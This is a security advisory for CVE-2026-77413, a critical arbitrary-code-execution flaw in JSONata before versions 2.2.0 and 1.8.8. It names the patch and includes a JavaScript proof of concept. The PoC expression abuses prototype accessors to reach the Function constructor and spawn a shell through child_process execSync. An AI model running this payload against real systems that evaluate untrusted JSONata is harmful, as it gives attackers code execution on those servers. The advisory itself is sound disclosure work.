CVE-2026-77413
## Impact Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function: https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705 This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release. ## PoC ```js import jsonata from "jsonata"; const expression = jsonata(` ( __lookupSetter__('__proto__')(constructor); __defineGetter__('l', constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'}).toString()")); valueOf().l ) `); await expression.evaluate({}); ```
Properties
- ghsa_id
- GHSA-8gq3-vp5j-2grp
- severity
- critical
- summary
- JSONata: Arbitrary Code Execution via crafted JSONata expressions
- cve_id
- CVE-2026-77413
- is_ghsa_only
- false
- ghsa_published
- 2026-08-21T20:57:07Z
- source_url
- https://github.com/advisories/GHSA-8gq3-vp5j-2grp
- ghsa_updated
- 2026-08-21T20:57:09Z
Related Entities (4)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
Explore deeper with Ninja Signal's threat intelligence graph